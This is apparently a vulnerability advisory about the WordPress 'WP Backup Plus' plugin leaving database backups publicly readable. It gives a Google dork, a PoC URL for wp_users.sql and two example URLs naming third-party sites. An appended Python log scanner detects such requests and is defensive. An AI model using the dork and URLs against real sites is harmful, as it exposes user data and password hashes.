WordPress Backup Plus plugin suffers from a backup disclosure vulnerability.
# WordPress 'WP Backup Plus' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: http://wpbackupplus.com/
# Google Dork: inurl:/wp-content/uploads/wp-backup-plus/
# PoC :
http://SITE.COM/wp-content/uploads/wp-backup-plus/temp/wp_users.sql (or another table name in place of wp_users).
# Examples:
http://easy-family-boating-recipes.com/wp-content/uploads/wp-backup-plus/temp/cnb24p_users.sql
http://bestsolarpanelsmelbourne.com.au/wp-content/uploads/wp-backup-plus/temp/wp_users.sql
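
# Detection (added example, not part of the original advisory):
The script below checks a site's own web server access log for requests into the plugin's backup directory and separates files that were actually served from blocked or failed probes. It assumes the combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory named in the advisory; backup dumps are written beneath it.
BACKUP_PREFIX = "/wp-content/uploads/wp-backup-plus/"

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def classify(line):
    """Return (verdict, client_ip, path) for a request into the backup dir, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode %xx escapes, collapse repeated slashes.
    path = re.sub(r"/+", "/", unquote(m["target"].split("?", 1)[0]))
    if not path.lower().startswith(BACKUP_PREFIX):
        return None
    size = 0 if m["size"] == "-" else int(m["size"])
    # 200/206 with a body means backup content (or a listing) left the server.
    served = m["status"] in ("200", "206") and size > 0
    return ("DISCLOSED" if served else "PROBE", m["ip"], path)

def scan(lines):
    """Classify every line and keep only requests that touched the backup dir."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '203.0.113.7 - - [15/May/2015:10:01:02 +0000] "GET /wp-content/uploads/wp-backup-plus/temp/wp_users.sql HTTP/1.1" 200 48213 "-" "-"',
    '203.0.113.7 - - [15/May/2015:10:01:05 +0000] "GET /wp-content/uploads/wp-backup-plus/temp/wp_options.sql HTTP/1.1" 403 199 "-" "-"',
    '198.51.100.9 - - [15/May/2015:10:02:00 +0000] "GET /wp-content/%75ploads/WP-Backup-Plus/temp/wp_users.sql?a=1 HTTP/1.1" 206 1024 "-" "-"',
    '192.0.2.44 - - [15/May/2015:10:03:00 +0000] "GET /wp-content/uploads/2015/05/photo.jpg HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for verdict, ip, path in scan(SAMPLE):
        print(f"{verdict:9} {ip:15} {path}")
```

A DISCLOSED verdict on a `*_users.sql` file means the password hashes in that table should be treated as exposed.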